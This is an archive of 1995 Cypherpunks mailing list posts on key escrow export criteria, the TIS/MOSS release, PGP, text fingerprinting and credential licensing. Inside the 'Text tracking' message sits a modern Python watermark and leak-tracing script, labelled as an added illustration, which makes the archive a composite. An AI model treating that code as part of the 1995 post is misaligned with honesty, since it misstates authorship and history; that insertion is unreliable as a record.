entities, the identity of the key escrow agent(s), and information
sufficient for the escrow agent(s) to identify the key or key
components required to decrypt that message.

5.      The product shall be resistant to any alteration that would
disable or circumvent the key escrow mechanism, to include being
designed so that the key escrow mechanism cannot be disabled by a
static patch, (i.e., the replacement of a block of code by a modified
block).

6.      The product shall not decrypt messages or files encrypted by
non-escrowed products, including products whose key escrow mechanisms
have been altered or disabled.

7.      The key escrow mechanism allows access to a user's encrypted
information regardless of whether that user is the sender or the
intended recipient of the encrypted information.

8.      The key escrow mechanism shall not require repeated involvement
by the escrow agents for the recovery of multiple decryption keys
during the period of authorized access.

9.      In the event any such product is or may be available in the
United States, each production copy of the software shall either have a
unique key required for decrypting messages or files that is escrowed
in accordance with #10, or have the capability for its escrow mechanism
to be rekeyed and any new key to be escrowed in accordance with #10.

10.     The product shall accept escrow of its key(s) only with escrow
agents certified by the U.S. Government or by foreign governments with
which the U.S. Government has formal agreements consistent with U.S.
law enforcement and national security requirements.

Note:  Software products incorporating additional encryption methods
other than key escrow encryption methods will be evaluated for export
on the basis of each encryption method included, as is already the case
with existing products.  Accordingly, these criteria apply only to the
key escrow encryption method incorporated by a software product, and
not to other non-escrowed encryption methods it may incorporate.  For
instance, non-escrowed encryption using a key length of 40 bits or less
will continue to be exportable under existing export regulations.

-

Please also review discussion paper #1 (distributed earlier), which
raises a number of issues involving exportability criteria and how
exportable products could be designed.  Discussion paper #2 (also
previously distributed) presents questions involving key escrow
agents.

~WASH01A:49767:1:|09/11/95
1-10




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 13 Sep 95 16:20:57 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and fails?
In-Reply-To: <TuNUwkkAsKkR084yn@ouray.cudenver.edu>
Message-ID: <Pine.SUN.3.91.950913192002.7390A-100000-100000-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 8 Sep 1995, Alan Westrope wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Tonight's local news included an interesting blurb about this case.
> The judge refused to order Wollersheim to disclose his passphrase,
> since the encrypted material comprised names of Co$ critics
> who could then be targeted by the Church.  And the secret (and
> copyright!) $criptures were read in court and excerpts broadcast
> on the news, "close-captioned for the hearing-impaired."

Anyone have the name of this action, the court it was in or the name of 
the judge?  I would very much like to see a transcript of his order.

> 
> All the entertaining stuff some of us have been reading on the
> net was there:  aliens transported to earth, volcanoes h-bombed,
> thetans...I laughed my ass off.  A bigtime win for PGP and encryption
> generally, and a major PR debacle for the $cienos.
> 
> Kute Korrespondences Koda:
> 
> Tomorrow, Sept. 9, there will be protests worldwide at Co$ centers.
> I was cleaning out some paperwork and disk file archives recently,
> and noticed that the ViaCrypt and Austin Code Works subpoenas were
> dated Sept. 9, 1993.  Grady Ward of ACW has, of course, been a
> major Co$ antagonist, making good use of PGP and the Cypherpunks
> remailers.  The old message I found detailing these subpoenas was
> from this list's sometime visionary, L. Detweiler.
> 
> Alan Westrope                  <awestrop@nyx10.cs.du.edu>
> __________/|-,                 <adwestro@ouray.cudenver.edu>
>    (_)    \|-'                  2.6.2 public key: finger / servers
> PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMFDh51RRFMq4NZY5AQEO/gP/VgOEP8LpcrrIno2yj3oqD7zHc3a0d5If
> GC/ze1b6frpWPKo2mIb7IiZQzQ8rkZmky07PR9MV6jPO4S8UCpwix/ylgV1kGWmd
> WWWe4t8xVfHc2wJGS7qjRvkt8PDvgPkcHWktxOHkASl9cemscwYJbGyXq1BkCJCT
> Mkgv7cSClDM=
> =Nuz5
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 13 Sep 95 19:26:27 PDT
To: cypherpunks@toad.com
Subject: Re: An opportunity not to be missed
Message-ID: <ac7ce20d1c021004b016@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:57 AM 9/14/95, Bill Stewart wrote:

>Is Wavy Gravy running his "Nobody for President" campaign again this time?
>After all, Nobody's going to balance the budget, and Nobody's going to
>get the government out of your bedroom, and on the internet, Nobody can tell
>if you're a dog or not :-)

Or to update it for today:

"Nobody@remailer.org for President."


--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 13 Sep 95 16:36:28 PDT
To: cypherpunks@toad.com
Subject: MOSS [IETF privacy-enhanced mail, modified for MIME] now available
Message-ID: <9509132335.AA05053@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>From pem-dev-request@neptune.tis.com Wed Sep 13 19:27:35 1995
Message-Id: <9509132011.AA19261@tis.com>
Reply-To: James M Galvin <tismoss-support@TIS.COM>
To: "MOSS.Announce.List":;, tis.com@TIS.COM
Subject: ANNOUNCE: TIS/MOSS Version 7.1
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----- =_aaaaaaaaaa0"
Content-Id: <2977.811023088.1@tis.com>
Date: Wed, 13 Sep 1995 16:11:35 -0400

------- =_aaaaaaaaaa0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <2977.811023088.2@tis.com>

Trusted Information Systems, Inc. (TIS), in cooperation with RSA Data
Security, Inc. (RSADSI), is pleased to provide TIS/MOSS, a reference
implementation of MIME Object Security Services (MOSS).  TIS/MOSS is a
security toolkit that provides digital signature and encryption services
for MIME objects.  TIS/MOSS includes the "glue" necessary for
integration with Version 6.8.3 of the Rand MH Message Handling System,
in addition to generic Bourne shell scripts that make it possible to use
it with email user agents supporting UNIX shell escapes.

In order to foster acceptance of MOSS and provide the community with a
usable, working version of this technology, TIS/MOSS is being made
available for broad use on the following basis.

TIS/MOSS is distributed in source code form, with all modules written in
the C programming language.  It runs on many UNIX derived platforms.  It
includes a DOS compilation directive that facilitates its port to
DOS/WINDOWS.

TIS/MOSS requires RSAREF, a cryptographic toolkit distributed by RSADSI.
TIS/MOSS makes use of undocumented features of RSAREF.  RSADSI has given
permission for users of TIS/MOSS to use these features, subject to the
terms and conditions of both the TIS/MOSS and RSAREF licenses, as
distributed with each software package.

TIS/MOSS is a product of Trusted Information Systems, Inc.  It may be
used by organizations and users for exchanging MOSS email messages,
subject to the terms and conditions of its license.  Enclosed below is
the MOSS Frequently Asked Questions, which includes instructions on how
to retrieve the software.

TIS/MOSS is export controlled by the U.S. Government.  As a result it is
only available to U.S. and Canadian sites and individuals.  Please see
the FAQ for more information.

------- =_aaaaaaaaaa0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <2977.811023088.3@tis.com>
Content-Description: TIS/MOSS FAQ


		  TIS/MOSS Frequently Asked Questions
			 Last Updated July 1995
	 Send questions and comments to tismoss-support@tis.com

Questions answered:

   1) What is MIME Object Security Services (MOSS)?
   2) What is MIME?
   3) How does MOSS compare to PGP and PEM?
   4) Where is the MOSS standard defined?
   5) Are there implementations of MOSS available?
   6) How do I get TIS/MOSS?
   7) Why is TIS/MOSS only available in the US and Canada?
   8) Are special privileges (e.g., root access) required to install
      TIS/MOSS?
   9) What about integrating TIS/MOSS into email user agents?
  10) What about DOS and other non-UNIX platforms?
  11) Is there a forum for MOSS users and developers?
  12) What about certificates?
  13) What is the Internet Certification hierarchy?
  14) What if I have questions or problems with TIS/MOSS?

 * means that this entry has been recently updated.
 + means that this entry has been added recently.


1
Q: What is MIME Object Security Services (MOSS)?

A: MOSS is a Privacy Enhanced Mail (PEM) derivative that is a Proposed
   Internet Standard for adding security services to Multi-purpose
   Internet Mail Extensions (MIME).  It uses the cryptographic
   techniques of digital signature and encryption to provide origin
   authentication, integrity, and confidentiality to MIME objects.
   Users of MOSS can know who originated a message, that the message
   has not been changed enroute, and that the message was kept secret
   from everyone except the intended recipients.

   MOSS depends on the existence of public/private key pairs to support
   its security services.  Users must exchange public keys with those
   other users with whom they wish to exchange MOSS email.  This may be
   accomplished manually, via mechanisms available in the protocol, via
   X.509 certificates, or any other suitable mechanism.

2
Q: What is MIME?

A: MIME is an Internet Standard (RFC 1521) that defines the format of
   email message bodies to allow multi-part textual and non-textual
   message bodies to be represented and exchanged without loss of
   information.  MIME does for message bodies what RFC822 does for
   message headers.

3
Q: How does MOSS compare to PGP and PEM?

A: PGP can provide the same services but since it is not integrated with
   MIME the interpretation of the protected content is necessarily user
   controlled.  Note, however, that MIME can carry a PGP object.

   MOSS is a PEM derivative.  It integrates the security services of PEM
   with MIME, taking advantage of the extensive structuring and
   formatting facilities of MIME, limited versions of which are
   necessarily an integral part of the PEM specifications.

4
Q: Where is the MOSS standard defined?

A: There is a Proposed Standard published as an RFC that specifies MOSS.
   This document may be found in your favorite RFC repository.
   Details on obtaining RFCs via FTP or EMAIL may be obtained by sending
   an EMAIL message to "rfc-info@ISI.EDU" with the message body "help:
   ways_to_get_rfcs".  For example:

        To: rfc-info@ISI.EDU
        Subject: getting rfcs

        help: ways_to_get_rfcs

5
Q: Are there implementations of MOSS available?

A: Yes, Trusted Information Systems (TIS), under ARPA sponsorship, has
   released a reference implementation of MOSS (TIS/MOSS) to the
   Internet community.

   TIS/MOSS is a UNIX-based implementation that is easily integrated
   with email user agents.  The source code is openly available in the
   United States and Canada for non-commercial use.  The current version
   of TIS/MOSS is 7.1.

   Vendors interested in including TIS/MOSS in their products or
   integrating it with their services should contact Trusted Information
   Systems about licensing Trusted Mail (tm) by sending email to
   tismoss-support@tis.com.

6
Q: How do I get TIS/MOSS?

A: TIS/MOSS is available via anonymous ftp in the United States and
   Canada to US and Canadian citizens and people with a US "green
   card."  To retrieve TIS/MOSS please FTP to

     host:   ftp.tis.com
     login:  anonymous

   and retrieve the files

     pub/MOSS/README
     pub/MOSS/LICENSE
     pub/MOSS/BUGS

   The README file contains further instructions.  

7
Q: Why is TIS/MOSS only available in the US and Canada?

A: The export from the United States of the cryptography used in
   TIS/MOSS is controlled by the United States government.

8
Q: Are special privileges (e.g., root access) required to install TIS/MOSS?

A: No.

9
Q: What about integrating TIS/MOSS into email user agents?

A: TIS/MOSS includes "glue", in the form of shell scripts, to integrate
   it with the Rand MH Message Handling System version 6.8.3.  It also
   includes generic scripts that make the services accessible to any
   UNIX application that supports shell escapes.  If you integrate
   TIS/MOSS with a popular email user agent, we would be happy to make
   it available to others.

10
Q: What about DOS and other non-UNIX platforms?

A: TIS/MOSS has been ported to DOS and includes a DOS compiler option
   that may be set to facilitate its installation in DOS environments.
   It has also been ported to Macintosh although it does not yet include
   a MAC compiler option.  If you port TIS/MOSS to other platforms, we
   would be happy to make the changes available to others.

11
Q: Is there a forum for MOSS users and developers?

A: Yes, there is an email list for users of TIS/MOSS called
   "tismoss-users@tis.com".  To get added to the list send a message to
   "tismoss-users-request@tis.com".

   There is an email list for implementors and discussions of the MOSS
   specifications called "pem-dev@tis.com".  This list originated with
   the PEM protocol, from which MOSS is derived.  To get added to the
   list send a message to "pem-dev-request@tis.com".

12
Q: What about certificates?

A: TIS/MOSS supports the use of X.509 certificates including creation,
   validation, certificate revocation lists, distribution, and
   destruction.  Users may embody their public key in a certificate and
   may participate in the Internet certification hierarchy or some other
   private hierarchy.  TIS/MOSS neither requires nor enforces any
   certification hierarchy policy.

13
Q: What is the Internet Certification hierarchy?

A: The Internet Certification hierarchy is defined by RFC1422.  It is a
   tree structured hierarchy of certificates with a single, global root
   called the Internet PCA Registration Authority (IPRA).  The IPRA
   issues certificates to Policy Certification Authorities (PCAs) who
   issue certificates to Certification Authorities (CAs) who may issue
   certificates to users or subordinate CAs.  Identities are based on
   distinguished names and there are restrictions on their form and
   content.

   For more information on becoming a PCA see the IPRA WWW page at:

	http://bs.mit.edu:8001/ipra.html

   or contact the IPRA at:

	ipra-info@isoc.org

   For more information on becoming a CA under the TIS PCA contact:

	tispca-info@tis.com

14
Q: What if I have questions about or problems with TIS/MOSS?

A: Send them to "tismoss-support@tis.com".

------- =_aaaaaaaaaa0
Content-Type: multipart/signed; protocol="application/moss-signature";
	micalg="md5"; boundary="----- =_aaaaaaaaaa1"

------- =_aaaaaaaaaa1
Content-Type: text/plain; charset="us-ascii"
Content-ID: <2977.811023088.5@tis.com>

Trusted Information Systems, Inc. (TIS), in cooperation with RSA Data
Security, Inc. (RSADSI), is pleased to provide TIS/MOSS, a reference
implementation of MIME Object Security Services (MOSS).  TIS/MOSS is a
security toolkit that provides digital signature and encryption services
for MIME objects.  TIS/MOSS includes the "glue" necessary for
integration with Version 6.8.3 of the Rand MH Message Handling System,
in addition to generic Bourne shell scripts that make it possible to use
it with email user agents supporting UNIX shell escapes.

In order to foster acceptance of MOSS and provide the community with a
usable, working version of this technology, TIS/MOSS is being made
available for broad use on the following basis.

TIS/MOSS is distributed in source code form, with all modules written in
the C programming language.  It runs on many UNIX derived platforms.  It
includes a DOS compilation directive that facilitates its port to
DOS/WINDOWS.

TIS/MOSS requires RSAREF, a cryptographic toolkit distributed by RSADSI.
TIS/MOSS makes use of undocumented features of RSAREF.  RSADSI has given
permission for users of TIS/MOSS to use these features, subject to the
terms and conditions of both the TIS/MOSS and RSAREF licenses, as
distributed with each software package.

TIS/MOSS is a product of Trusted Information Systems, Inc.  It may be
used by organizations and users for exchanging MOSS email messages,
subject to the terms and conditions of its license.  Enclosed below is
the MOSS Frequently Asked Questions, which includes instructions on how
to retrieve the software.

TIS/MOSS is export controlled by the U.S. Government.  As a result it is
only available to U.S. and Canadian sites and individuals.  Please see
the FAQ for more information.

------- =_aaaaaaaaaa1
Content-Type: application/moss-signature
Content-ID: <2977.811023088.4@tis.com>
Content-Transfer-Encoding: quoted-printable

Version: 5
Originator-ID: PK,MHkwCgYEVQgBAQICAwADawAwaAJhAMAHQ45ywA357G4fqQ61aoC1fO6B=
ekJmG4475mJkwGIUxvDkwuxe/EFdPkXDGBxzdGrW1iuh5K8kl8KRGJ9wh1HU4TrghGdhn0Lw8g=
G67Dmb5cBhY9DGwq0CDnrpKZV3cQIDAQAB,EN,2,galvin@tis.com
MIC-Info: RSA-MD5,RSA,jZjz1ope/QCf2IwPfkXfB+0bNJsFqJny+xVqjyFaW6QAY0Oy4dru=
PxTgYleEFG2qQBP6rbNiucG7g254ClV6hUMG6ksd+qFioFvxqsJ15WylN7Addo/QCzknzhRo45=
6l

------- =_aaaaaaaaaa1--

------- =_aaaaaaaaaa0--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 13 Sep 95 16:49:24 PDT
To: cypherpunks@toad.com
Subject: Text tracking
In-Reply-To: <QQzgrh03331.199509110422@relay3.UU.NET>
Message-ID: <Pine.SUN.3.91.950913194148.7390C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 11 Sep 1995 owner-cypherpunks@toad.com wrote:

>   Hal Finney wrote:
> 
> > I'm not sure how to do it for software, but for novels it
> > should be easy to fingerprint.  Every couple of pages the
> > author writes a sentence twice in different forms.  This would
> > not take a great deal of extra effort on the part of the
> > author.
> 
>   Perhaps.  Some authors might be offended by the idea that
> using a different form of a sentence doesn't affect the work.

Examples of "text tracking" in documents where language specificity is 
important (legal, scientific) are typically marked with changes in the 
justification scheme, i.e. the number of spaces to the right, number of 
lines to a page, number of pages total, etc. etc.

Clearly it is much more difficult to apply in digital schemes, but 
consider that in order to modify the scheme to avoid traceback to the 
distributer, one of two conditions must exist.

1>  The distributer must be close to the initial release point.

  (If not, then all documents ABOVE the distributer in the chain will be 
   text tracked, and all the documents BELOW the distributer will not.  
   Clearly this will brand the distributer).

2>  The distributer must be entirely outside the 'legal' distribution scheme.

Remember also that uniform modification of text tracking methods is 
itself identifying unless several 'illegal' distributers are using the 
same sanitizing method.

The same way you can get surgery to have fingerprints removed, but the 
resulting scars make you all the more identifiable.
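
The spacing-based marking and the "sanitizing brands you" argument in the message above can be modelled in a few lines. This is an added illustration, not part of the original message: the one-space/two-space encoding, the leading sync gap, the registry, and the holder names are all assumptions made for the sketch.

```python
import re

# Constructed sample document: nine sentences, so eight inter-sentence gaps.
SAMPLE = (
    "The parties agree to the terms below. Payment is due in thirty days. "
    "Late payment accrues interest. Either party may terminate on notice. "
    "Notices must be in writing. This agreement is governed by local law. "
    "Amendments require both signatures. Headings are for convenience only. "
    "The schedule forms part of this agreement."
)

# A gap is the run of spaces between a sentence end and the next sentence.
GAP = re.compile(r"(?<=[.!?]) +(?=\S)")


def capacity(text):
    """Number of sentence gaps available to carry mark bits."""
    return len(GAP.findall(text))


def embed(text, recipient_id, nbits):
    """Encode recipient_id in gap widths: one space = 0, two spaces = 1.

    The first gap is a sync bit that is always 1, so a marked copy can never
    consist of single spaces only. The all-ones ID is reserved so a marked
    copy can never consist of double spaces only either.
    """
    if not 0 <= recipient_id < (1 << nbits) - 1:
        raise ValueError("ID out of range (the all-ones value is reserved)")
    if capacity(text) < nbits + 1:
        raise ValueError("not enough sentence gaps to carry the mark")
    bits = [1] + [(recipient_id >> (nbits - 1 - i)) & 1 for i in range(nbits)]
    remaining = iter(bits)
    # Gaps past the end of the mark are written as a single space.
    return GAP.sub(lambda m: "  " if next(remaining, 0) else " ", text)


def extract(copy, nbits):
    """Return the embedded ID, or None if the sync bit or a gap is invalid."""
    widths = [len(g) for g in GAP.findall(copy)]
    if len(widths) < nbits + 1 or widths[0] != 2:
        return None
    payload = widths[1:nbits + 1]
    if any(w not in (1, 2) for w in payload):
        return None
    value = 0
    for w in payload:
        value = (value << 1) | (w - 1)
    return value


def classify(copy, registry, nbits):
    """Classify a recovered copy.

    A copy whose gaps are all the same width has had its mark normalised
    away. The width that was used is itself a trait of whoever did it.
    """
    widths = [len(g) for g in GAP.findall(copy)]
    if widths and len(set(widths)) == 1:
        return ("stripped", widths[0])
    rid = extract(copy, nbits)
    if rid is None:
        return ("damaged", None)
    if rid in registry:
        return ("marked", registry[rid])
    return ("unregistered", rid)


def locate_break(chain, registry, nbits):
    """Find where the mark disappears in an ordered distribution chain.

    chain lists (holder, copy_held) pairs from the release point downward.
    The holder of the last marked copy above the first stripped copy is the
    point where sanitizing happened.
    """
    last_marked = None
    for holder, copy in chain:
        state, _ = classify(copy, registry, nbits)
        if state == "marked":
            last_marked = holder
        elif state == "stripped":
            return last_marked
    return None


if __name__ == "__main__":
    registry = {37: "alice", 12: "bob"}          # constructed licensee list
    marked = embed(SAMPLE, 37, 6)
    stripped = GAP.sub(" ", marked)
    chain = [("wholesaler", marked), ("reseller", marked),
             ("kiosk", stripped), ("buyer", stripped)]
    print(classify(marked, registry, 6))
    print(classify(stripped, registry, 6))
    print(locate_break(chain, registry, 6))
```
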





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 13 Sep 95 17:30:55 PDT
To: Dar Scott <dsc@swcp.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <v01510101ac7d199d2ae0@[198.59.115.138]>
Message-ID: <Pine.SUN.3.91.950913200706.7390D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 13 Sep 1995, Dar Scott wrote:

> Black Unicorn wrote,
> >But won't clients insist on proper credentials in one form or another?
> 
>      Yes.
> 
> >Doesn't the practicality and accountability of a centralized authority
> >(or several authorities) provide the best answer to this?
> 
>      No.
> 
> >Who is going
> >to accept my signature promising that I did indeed get a law degree and
> >pass the bar?
> 
>      Very few.
> 
>      Certification can be from multiple private and
>      government organizations and might vary depending
>      on the type of legal service (or other lawyer service)
>      needed.

Didn't I just say this above?

A centralized, or several centralized authorities.

I guess the center of my question is, how can you apply Web of Trust to 
e.g. a university degree.  Who cares what Bob and Alice think my degree 
is in, the client only wants to know from the institution.

>      Licensing can only be done by an
>      entity that can use physical force to prevent
>      buying and selling legal services.

I believe you are incorrect, but I guess my main concern is your 
characterization of "Physical force."  I am assuming you mean coercion, 
and not that you will be jailed or such (though this may be the case).

I would argue that as long as coercion exists (violence of any type, 
physical or not) you have a licensing authority.  Take the Hollywood
blacklist.  No one actually pushed around suspected pinko screenwriters
(well, at least, if anyone did, it was incidental) but they certainly
faced a great deal of persuasive motivation.  Look at the committee as 
the licensing authority here.  (Licensing you as a non-communist as it were).

If several governmental and private authorities were in the practice of 
certifying that Bob has a law degree from Tremont University, and that he
is competent to practice in D.C., and given that the citizens of D.C.
will look for these credentials, isn't this a license?  After all, Bob has
to pass some test or requirement to get the signatures.  Isn't this 
coercion in your definition?  Can't the multiple authorities set common 
or near common guidelines?  Rather, don't they HAVE to in order to have 
their signatures worth the electrons they are transmitted with?

If you take the extreme position you seem to, there's an antitrust case here.

Am I not "licensing" my key signature to people provided they pass my key 
signature criteria?  Am I not doing violence by withholding my signature 
and the benefits it might convey for certain "terms?"

In this definition, all trusted authorities are by definition licensing.  

Either their signature is worth nothing, and thus they are not coercive by 
withholding it, or it is worth something, and thus to be non-coercive they
must give it to anyone who asks, rendering their signatures worthless.

This is the trap of the licensing argument.

The evil is not licensing, which I think serves a real purpose, but 
created convenience fees, taxation through the withholding of licensing 
and the use of other government largess.   I wrote a massive piece on this 
and sent it to the list about a year and a half ago.  With interest I will 
repost it.

The real question is how you decide what an authority to license is.  Is 
it to be dictated by government?  Or by market forces (i.e. the 
reputation of the licenser).


> 
> >I don't see how the net will eliminate the basic need for highly
> >qualified professionals and the proof that they have credentials.
> 
>      It won't.  The needs might shift a little but they
>      will be there.

Then why will lawyers, or a 'professional monopoly' be broken?

> >Perhaps diplomas and such will be transfered into digital signatures for
> >the institutions, but I can't see how this "cracks" any "monopoly."
> >Perhaps the monopoly is shifted to those who have diplomas, rather than
> >those "licensed to practice" but so what?
> 
>      It might "crack" government enforced monopoly.

Now you are getting more specific.

>      Should a market monopoly survive some form of
>      crypto-anarchy it would be in the form of a
>      certification entity that does such a good and
>      efficient job that it is very hard to break
>      into the business.

Agreed.  Again, what does this do to lawyers?  See my above comments on 
what constitutes a license.

>      Not so bad if it happens,
>      but much more honest, efficient and softer-edged
>      than "licensed to practice".

I'm not so sure.  There will be a tremendous amount of corporate power in 
these authorities, and if (as you seem to be saying a few paragraphs up) it 
is hard to break into the trusted certification business, there is a 
monopoly again.

>      I suspect that
>      people have needs for varying levels and varying
>      specializations so that several kinds of
>      certifications may develop and might be supplied
>      by multiple entities.

Like the several state Bars?

Hint: An attorney licensed in Delaware has a much different speciality
likely than one licensed in Alabama.

>      I suspect that many people would want a
>      certification that a lawyer meets the usual
>      licensing requirements of the outside world.
>      Who knows, maybe that would be the most popular kind.
>      But it won't be the only kind.

So you have essentially admitted that a central authority is required?
Or will be more often used?

So is this a license or what?  Looks like one to me.

If your definition of license is simply who does the coercing, I think you
should reconsider.

> Dar
> 
> ===========================================================
> Dar Scott               Home phone: +1 505 299 9497
> 
> Dar Scott Consulting         Voice: +1 505 299 5790
> 8637 Horacio Place NE        Email: darscott@aol.com
> Albuquerque, NM  87111              dsc@swcp.com
>                                Fax: +1 505 898 6525
> http://www.swcp.com/~correspo/DSC/DarScott.html
> ===========================================================
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 13 Sep 95 18:55:35 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Key Escrow as Law Enforcement's *Worst Nightmare*
In-Reply-To: <ac7b412911021004bdd2@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.950913205344.29344C-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Darn.  I always thought it came from "The Monkey's Paw."

MacN

On Tue, 12 Sep 1995, Timothy C. May wrote:

> 
> "Be careful what you ask for--you might get it." (Albanian Proverb)
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Wed, 13 Sep 95 18:15:04 PDT
To: cypherpunks@toad.com
Subject: MS-Word macros disassembler/cracker?
Message-ID: <Pine.3.89.9509132130.E18266-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



This was on the Info-Sec mailing list and appears to be a request for 
help in cracking some sort of execute-only wrappers on MicroSoft 
Word-for-Windows macros, the concern being that the macros need to be 
defused if they're malignant.  If anybody wants to, they may respond right 
to: njb@csehost.knoware.nl <Niels J. Bjergstrom>.

. . . .

>All the macros are made ExecuteOnly, meaning that they are compiled or
>encrypted so that the Word macro interpreter can execute them, but they
>cannot be listed or edited. Does anyone reading this list happen to know
>where we can find a cracker or disassembler for ExecuteOnly Word macros? It
>is of vital importance that we are able to read malignant Word macros, and
>any help will be appreciated.

. . . .

>macro vira to us at the email address below. And I repeat: We are very
>interested in obtaining a cracker for the Word macro language
>encryptor/compiler. We haven't looked at this yet. For all we know it could
>be very simple, but any info is appreciated.
>
>Niels
>
>-- Niels J Bjergstrom, Ph.D., m/ISACA            Tel. +31 70 362 2269 --
>-- Computer Security Engineers, Ltd.             Fax. +31 70 365 2286 --
>-- Postbus 85 502, NL-2508 CE Den Haag       London: +44 181 519 8011 --
>-- Netherlands                          Email: njb@csehost.knoware.nl --
>-- PGP Public key available on request - please use when mailing vira --





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 13 Sep 95 18:20:40 PDT
To: don@cs.byu.edu
Subject: Re: Factoring Software (fwd)
In-Reply-To: <199509140039.SAA00376@wero.byu.edu>
Message-ID: <199509140120.VAA05979@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Just saw this on Usenet, was wondering who knows this guy. Obviously not
> a cpunk or it would have hit the list right away. Not in the mood to run
> code on my account without knowing that I know what it will do.

Gee, Bob moved -- I wonder how long he's been at MathWorks...
Anyways, Bob Silverman is a known Factoring Guy (TM).  He's been
involved in network factoring for a long time.

The software he is distributing, MPQS, is the algorithm that was used
to factor rsa-129.  Although this is probably not the same
implementation that we used then, it probably is pretty much the same.

I've met Bob; he is not a tentacle. ;-)

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 13 Sep 95 19:31:38 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <199509131926.PAA14458@panix.com>
Message-ID: <Pine.SOL.3.91.950913212637.29344J-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


I don't know about national characteristics.  After all,
"What's in a name?  Would a rose by any other name..."
and so on.

Cypherpunk fits.  Cypherpunk suits.  So, if the
suit fits...

MacN

On Wed, 13 Sep 1995, Duncan Frissell wrote:

> At 10:57 AM 9/13/95 -0700, Timothy C. May wrote:
> 
> >While I have had some qualms about the name, on balance I think it has been
> >good for us. After all, it's not as if _other_ groups don't already exist!
> >In particular, the British branch of Cypherpunks disliked the name
> >"Cypherpunks" so much that they used a different name for themselves, the
> >"U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for
> >whatever reasons. But the name may have been a factor, at least.
> 
> Note too that Brits differ from Americans.  "Wired" worked well here from
> the beginning but has had problems there.  Differing national characteristics.
> 
> DCF
> 
> "Let's all just agree to disagree.  My system can thrive with widespread
> disagreement among rabid individualists --- can yours?"
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 13 Sep 95 20:05:59 PDT
To: Patrick Horgan <patrick@Verity.COM>
Subject: Re: Digital Fingerprinting
In-Reply-To: <9509131457.AA17323@cantina.verity.com>
Message-ID: <Pine.SOL.3.91.950913220454.844D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 13 Sep 1995, Patrick Horgan wrote:

> > 
> > > Then, in W.Ky., as in Stockbridge, "You can get
> > > anything you want..."? :)
> > 
> > I'd stick with:
> > ***********************************************
> > You can't always get what you want            1
> > but if you try
> > sometimes, sometimes you get what you need.   2
> > ***********************************************
> > 
> > 1 ability to dump garbage where you want
> > 2 a better appreciation for the environment
> > :-)
> 
> 
> Why do I feel like I'm sitting on the group W bench?

I don't know, kid, what you in for?

MacN




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 13 Sep 95 19:22:33 PDT
To: cme@tis.com
Subject: Re: Can GAK be made "not interoperable" with PGP?
Message-ID: <80481.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  Duncan Frissell <frissell@panix.com>  writes:
> Timothy C. May wrote:
>>But is this even possible, to make a GAK system "not interoperable" with,
>>  say, PGP?
>>   Unless the GAK system has some sort of entropy analyzer, and can
>>  recognize high-entropy sources which it presumes to be encrypted data
>>  (*), one can of course PGP-encrypt a text file and then GAK the
>> resulting file.
>
> I took it to mean that they were saying that an approved program on one
> end of a communication exchange could not exchange encrypted messages or
> establish an encrypted session of some kind with an unapproved program
> on the other end.  Not trying to outlaw superencryption (PGP on both ends
> using a GAKed channel) but GAK on one end working with an unapproved
> system on the other end.  A ringer GAK-work-alike that would defeat the
> intent of GAK.
> I don't know if the government can prevent that with a software-only
> system or indeed if half a secure system can be made completely secure.

